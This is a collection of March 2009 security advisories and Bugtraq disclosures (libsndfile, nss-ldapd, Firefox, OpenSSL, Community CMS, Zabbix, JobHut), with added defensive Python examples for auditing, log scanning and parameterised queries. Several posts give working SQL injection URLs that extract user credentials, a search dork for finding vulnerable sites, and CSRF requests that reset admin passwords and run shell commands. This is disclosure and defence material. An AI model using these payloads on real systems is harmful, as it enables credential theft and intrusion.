===========================================================
Ubuntu Security Notice USN-749-1 March 30, 2009
libsndfile vulnerability
CVE-2009-0186
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libsndfile1 1.0.12-3ubuntu1.1
Ubuntu 7.10:
libsndfile1 1.0.17-4ubuntu0.7.10.1
Ubuntu 8.04 LTS:
libsndfile1 1.0.17-4ubuntu0.8.04.1
Ubuntu 8.10:
libsndfile1 1.0.17-4ubuntu0.8.10.1
After a standard system upgrade you need to restart your session to effect
the necessary changes.
Details follow:
It was discovered that libsndfile did not correctly handle description
chunks in CAF audio files. If a user or automated system were tricked into
opening a specially crafted CAF audio file, an attacker could execute
arbitrary code with the privileges of the user invoking the program.
Date: Mon, 30 Mar 2009 21:55:45 +0200
Message-ID: <48317b000903301255m1f398525mcf433621dd8cbf9@mail.gmail.com>
Subject: Community CMS 0.5 Multiple SQL Injection Vulnerabilities
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>, str0ke <str0ke@milw0rm.com>
******* Salvatore "drosophila" Fresta *******
[+] Application: Community CMS
[+] Version: 0.5
[+] Website:
http://sourceforge.net/projects/communitycms/
[+] Bugs: [A] Multiple SQL Injection
[+] Exploitation: Remote
[+] Dork: intext:"Powered by Community CMS"
[+] Date: 30 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] SQL Injection
[-] File affected: view.php, calendar.php
This bug allows a guest to view username and
password of a registered user.
*************************************************
[+] Code
- [A] Multiple SQL Injection
http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT
1,2,username,password,5,6,7,8,9 FROM comcms_users
http://www.site.com/path/index.php?id=2&view=event&a=-1 UNION ALL
SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a,
password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
Date: Mon, 30 Mar 2009 23:47:00 +0200
From: Moritz Muehlenhoff <jmm@debian.org>
Subject: [SECURITY] [DSA 1758-1] New nss-ldapd packages fix information disclosure
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1758-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
March 30, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : nss-ldapd
Vulnerability : insecure config file creation
Problem-Type : local
Debian-specific: yes
CVE ID : CVE-2009-1073
Debian Bug : 520476
Leigh James discovered that nss-ldapd, an NSS module for using
LDAP as a naming service, by default creates the configuration file
/etc/nss-ldapd.conf world-readable which could leak the configured
LDAP password if one is used for connecting to the LDAP server.
The old stable distribution (etch) doesn't contain nss-ldapd.
For the stable distribution (lenny) this problem has been fixed in
version 0.6.7.1.
For the unstable distribution (sid) this problem has been fixed in
version 0.6.8.
We recommend that you upgrade your nss-ldapd package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
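Added example, not part of the Debian advisory: a Python audit for the condition DSA-1758-1 describes, a world-readable nss-ldapd configuration file that contains an LDAP bind password. The option name `bindpw`, the function names and the sample file are assumptions made for this illustration; the sample configuration is constructed.

```python
import os
import stat
import tempfile

# Keyword that holds the LDAP bind password. Assumption: the advisory only
# says "the configured LDAP password"; "bindpw" is the option name used here.
PASSWORD_OPTION = "bindpw"


def has_bind_password(path):
    """Return True if an active (uncommented) line sets a bind password."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for line in fh:
            fields = line.split(None, 1)
            if (len(fields) == 2
                    and fields[0].lower() == PASSWORD_OPTION
                    and fields[1].strip()):
                return True
    return False


def audit_config(path, fix=False):
    """Report, and optionally tighten, the permissions of a config file.

    "exposed" is True only when the file is readable by other local users
    AND actually carries a password, which is the case the advisory names.
    """
    mode = stat.S_IMODE(os.stat(path).st_mode)
    world_readable = bool(mode & stat.S_IROTH)
    has_password = has_bind_password(path)
    mode_after = mode
    if fix and world_readable:
        # Clear every "other" bit; owner and group bits stay as they were.
        mode_after = mode & ~stat.S_IRWXO
        os.chmod(path, mode_after)
    return {
        "mode": mode,
        "mode_after": mode_after,
        "world_readable": world_readable,
        "has_password": has_password,
        "exposed": world_readable and has_password,
    }


def run_constructed_sample():
    """Audit a constructed config that was created with mode 0644."""
    fd, path = tempfile.mkstemp(suffix=".conf")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write("# constructed sample, not a real configuration\n"
                     "uri ldap://ldap.example.net/\n"
                     "base dc=example,dc=net\n"
                     "binddn cn=proxy,dc=example,dc=net\n"
                     "bindpw CONSTRUCTED-PLACEHOLDER\n")
        os.chmod(path, 0o644)
        before = audit_config(path)
        after = audit_config(path, fix=True)
        final_mode = stat.S_IMODE(os.stat(path).st_mode)
        return before, after, final_mode
    finally:
        os.unlink(path)


if __name__ == "__main__":
    before, after, final_mode = run_constructed_sample()
    print("exposed before fix:", before["exposed"])
    print("mode before/after: %o -> %o" % (before["mode"], final_mode))
```

If the audit reports an exposed password on a host with other local users, change the LDAP bind password as well, because tightening the mode does not undo earlier reads.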
From: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
To: FD <full-disclosure@lists.grok.org.uk>,
bugtraq <bugtraq@securityfocus.com>
Cc: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
Date: Mon, 30 Mar 2009 17:41:16 -0500
Subject: ZDI-09-015: Mozilla Firefox XUL _moveToEdgeShift() Memory
Corruption Vulnerability
ZDI-09-015: Mozilla Firefox XUL _moveToEdgeShift() Memory Corruption
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-015
March 30, 2009
-- CVE ID:
CVE-2009-1044
-- Affected Vendors:
Mozilla Firefox
-- Affected Products:
Mozilla Firefox 3.0.x
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page.
The specific flaw exists in the XUL tree method _moveToEdgeShift(). In
some cases this call will trigger garbage collection routines on in use
objects which will result in a future call to a dangling pointer. This
can be leveraged to execute arbitrary code under the context of the
current user.
-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:
http://www.mozilla.org/security/announce/2009/mfsa2009-13.html
-- Disclosure Timeline:
2009-03-19 - Vulnerability reported to vendor
2009-03-30 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Nils
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Date: Mon, 30 Mar 2009 16:13:14 -0700
From: Adam Baldwin <adam_baldwin@ngenuity-is.com>
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Zabbix Multiple Frontend CSRF (Password reset & command execution)
nGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-006 - Zabbix Multiple Frontend CSRF
Application: Zabbix 1.6.2
Vendor: Zabbix
Vendor website:
http://www.zabbix.com
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
I. BACKGROUND
"ZABBIX is an enterprise-class open source distributed monitoring solution." [1]
II. DETAILS
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist that can allow for the following
attack scenarios to be executed should an administrator with a valid session visit a malicious page
or url.
1. Reset admin password
2. Execution of shell commands
Reset Admin Password:
Zabbix does not validate a user's old password before the new password is set using a request
similar to the below request. Some of the parameters are not required for the request to be
valid.
Example:
http://example.com/zabbix/profile.php?autologout=900&change_password=Change%20password
&config=0&form=1&form_refresh=2&lang=en_gb&password1=aaaaaa&password2=aaaaaa&refresh=30
&save=Save&theme=default.css&url=&userid=1
Execution of Shell Commands:
A two-stage approach is required to execute arbitrary shell commands. First the custom command to
be executed has to be created, and then that command has to be executed. Below is an example of how
these requests could be executed.
Example: Setting the command
http://example.com/zabbix/scripts.php?action=1&access=2&command=touch%20/tmp/zabbix&form=1
&form_refresh=1&form_refresh=1&groupid=0&name=Ping&save=Save&scriptid=1&usrgrpid=0
Example: Executing the command
http://example.com/zabbix/scripts_exec.php?execute=1&hostid=10017&scriptid=1
III. REFERENCES
[1] - http://www.zabbix.com
IV. VENDOR COMMUNICATION
3.22.2009 - Vulnerability Discovery
3.23.2009 - Vendor response. Fixed in 1.6.3 (unconfirmed)
Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/03/30/ngenuity-2009-006-zabbix-multiple-frontend-csrf/
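For operators still running an affected frontend, the three request shapes in the advisory can be hunted for in web server access logs. The following is an added example, not part of the original advisory or of Zabbix: it flags GET requests to the three scripts that carry the state-changing parameters and did not originate from the frontend's own host. The log lines, client addresses and the `attacker.example` host are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" access log format (assumed for this example).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# Frontend script -> query parameters that, present together, mark the
# state-changing requests shown in the advisory's example URLs.
SENSITIVE = {
    "profile.php": {"password1", "password2", "save"},
    "scripts.php": {"command", "save"},
    "scripts_exec.php": {"execute", "scriptid"},
}


def classify(line, frontend_host):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    url = urlsplit(m["target"])
    script = url.path.rsplit("/", 1)[-1]
    required = SENSITIVE.get(script)
    if required is None:
        return None
    # Only the query string is logged; parameters sent in a POST body
    # are invisible here, so this covers the GET form shown above.
    params = parse_qs(url.query, keep_blank_values=True)
    if not required.issubset(params):
        return None
    referer = m["referer"]
    ref_host = None if referer in ("", "-") else urlsplit(referer).hostname
    if ref_host == frontend_host.lower():
        return None  # navigation that started inside the frontend
    if ref_host is None:
        reason = "no Referer"  # lower confidence: bookmarks and scripts also do this
    else:
        reason = "cross-site Referer " + ref_host
    return {"client": m["client"], "script": script, "reason": reason}


def scan(lines, frontend_host):
    """Classify every line and keep only the findings."""
    findings = (classify(line, frontend_host) for line in lines)
    return [f for f in findings if f is not None]


# Constructed sample log lines; example.com plays the Zabbix frontend.
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Mar/2009:16:20:01 -0700] '
    '"GET /zabbix/profile.php?change_password=Change%20password&password1=x'
    '&password2=x&save=Save&userid=1 HTTP/1.1" 302 - '
    '"http://attacker.example/page.html" "Mozilla/5.0"',
    '192.0.2.11 - - [30/Mar/2009:16:21:40 -0700] '
    '"GET /zabbix/scripts.php?action=1&command=uptime&name=Ping&save=Save'
    '&scriptid=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [30/Mar/2009:16:22:05 -0700] '
    '"GET /zabbix/scripts_exec.php?execute=1&hostid=10017&scriptid=1 HTTP/1.1" '
    '200 734 "http://example.com/zabbix/scripts.php" "Mozilla/5.0"',
    '192.0.2.10 - - [30/Mar/2009:16:23:11 -0700] '
    '"GET /zabbix/profile.php HTTP/1.1" 200 2048 '
    '"http://attacker.example/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "example.com"):
        print(finding)
```

A hit with a cross-site Referer on `profile.php` or `scripts.php` warrants checking whether the admin password or the stored script definition changed at that time.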
Date: Mon, 30 Mar 2009 17:14:14 -0600
Message-Id: <200903302314.n2UNEElg020351@www5.securityfocus.com>
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_108$2009] JobHut <= 1.2 (pk) Remote Sql Injection Vulnerability
ECHO_ADV_108$2009
-----------------------------------------------------------------------------------------
[ECHO_ADV_108$2009] JobHut <= 1.2 (pk) Remote Sql Injection Vulnerability
-----------------------------------------------------------------------------------------
Author : K-159
Date : March, 30 th 2009
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore2
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : JobHut
version : <= 1.2
Vendor : http://jobhut.spranger.us/
Description :
JobHut is an open source job board solution.
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~
Input passed to the "pk" parameter in the browse.php page is not properly verified before being used
in SQL queries. This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
Poc/Exploit:
~~~~~~~
http://www.example.com/[path]/browse.php?pk=-1 union select @@version,2--
Dork:
~~~
Google : N/A
Solution:
~~~~~
- Edit the source code to ensure that input is properly verified.
Timeline:
~~~~~~~
- 21 - 03 - 2009 bug found
- 26 - 03 - 2009 vendor contacted
- 26 - 03 - 2009 vendor response
- 30 - 03 - 2009 advisory release
---------------------------------------------------------------------------
Shoutz:
~~~
~ ping - my dearest wife, zizau - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~
K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage: http://www.e-rdc.org/
-------------------------------- [ EOF ] ----------------------------------
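The "Solution" above asks for the input to be properly verified. The following is an added example, not code from JobHut or from the advisory author: it puts a lookup that concatenates `pk` into the statement beside one that validates it as an integer and binds it as a parameter. The `jobs` table, its columns and the function names are hypothetical, SQLite stands in for the real database, and the test value is the advisory's proof-of-concept string adapted to SQLite syntax.

```python
import re
import sqlite3


def make_db():
    """In-memory stand-in for the job board database (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE jobs (pk INTEGER PRIMARY KEY, category_pk INTEGER, "
        "title TEXT, company TEXT)"
    )
    db.executemany(
        "INSERT INTO jobs (category_pk, title, company) VALUES (?, ?, ?)",
        [(1, "Sysadmin", "Acme"), (1, "DBA", "Initech"), (2, "Designer", "Globex")],
    )
    return db


def browse_vulnerable(db, pk):
    # The request value becomes part of the SQL text, so the database
    # parses whatever the client sent as SQL: the flaw the advisory describes.
    sql = "SELECT title, company FROM jobs WHERE category_pk = " + pk
    return db.execute(sql).fetchall()


_PK_RE = re.compile(r"[0-9]{1,10}")


def browse_hardened(db, pk):
    # 1. Verify the input: pk must be a short string of decimal digits.
    if not isinstance(pk, str) or not _PK_RE.fullmatch(pk):
        raise ValueError("pk must be a non-negative integer")
    # 2. Bind it as a parameter so it can only ever be treated as a value.
    sql = "SELECT title, company FROM jobs WHERE category_pk = ?"
    return db.execute(sql, (int(pk),)).fetchall()


def browse_bound_only(db, pk):
    # Binding alone already stops the injection; without the validation
    # step a malformed pk simply matches no rows instead of being rejected.
    sql = "SELECT title, company FROM jobs WHERE category_pk = ?"
    return db.execute(sql, (pk,)).fetchall()


# Constructed test value: the advisory's PoC with @@version replaced by
# SQLite's sqlite_version() so it parses on the stand-in database.
PAYLOAD = "-1 union select sqlite_version(), 2--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", browse_vulnerable(db, PAYLOAD))
    print("bound only:", browse_bound_only(db, PAYLOAD))
    try:
        browse_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened :", exc)
    print("hardened, pk=1:", browse_hardened(db, "1"))
```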
Date: Mon, 30 Mar 2009 18:23:19 -0500
From: Jamie Strandboge <jamie@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-750-1] OpenSSL vulnerability
Message-ID: <20090330232319.GA23857@severus.strandboge.com>
Reply-To: Jamie Strandboge <jamie@canonical.com>
==========================================================
Ubuntu Security Notice USN-750-1 March 30, 2009
openssl vulnerability
CVE-2009-0590
==========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
libssl0.9.8 0.9.8a-7ubuntu0.7
Ubuntu 7.10:
libssl0.9.8 0.9.8e-5ubuntu3.4
Ubuntu 8.04 LTS:
libssl0.9.8 0.9.8g-4ubuntu3.5
Ubuntu 8.10:
libssl0.9.8 0.9.8g-10.1ubuntu2.2
After a standard system upgrade you need to reboot your computer to
effect the necessary changes.
Details follow:
It was discovered that OpenSSL did not properly validate the length of an
encoded BMPString or UniversalString when printing ASN.1 strings. If a user
or automated system were tricked into processing a crafted certificate, an
attacker could cause a denial of service via application crash in
applications linked against OpenSSL.
Updated packages for Ubuntu 6.06 LTS:
Updated packages for Ubuntu 7.10:
Updated packages for Ubuntu 8.04 LTS:
Updated packages for Ubuntu 8.10: